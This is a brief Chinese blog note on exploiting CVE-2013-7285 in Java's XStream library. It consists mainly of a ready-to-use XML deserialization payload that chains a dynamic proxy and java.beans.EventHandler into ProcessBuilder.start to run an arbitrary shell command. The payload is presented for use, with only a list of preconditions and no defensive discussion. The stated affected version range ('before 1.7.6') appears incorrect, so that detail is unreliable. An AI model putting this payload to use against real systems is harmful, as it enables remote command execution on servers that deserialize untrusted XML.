【笔记】CVE-2013-7285漏洞利用

发表于 更新于 阅读次数:

前言

Java的com.thoughtworks.xstream.XStream包的1.7.6以前的版本出现的CVE-2013-7285的漏洞利用

漏洞利用前提

  • Java
  • 引用了1.7.6以前的版本的 com.thoughtworks.xstream.XStream 包

payload

<<command>>:Shell命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<sorted-set>
  <string>foo</string>
  <dynamic-proxy>
    <interface>java.lang.Comparable</interface>
    <handler class="java.beans.EventHandler">
      <target class="java.lang.ProcessBuilder">
        <command>
          <string><<command>></string>
        </command>
      </target>
      <action>start</action>
    </handler>
  </dynamic-proxy>
</sorted-set>

完成

参考文献

哔哩哔哩——逆风微笑的代码狗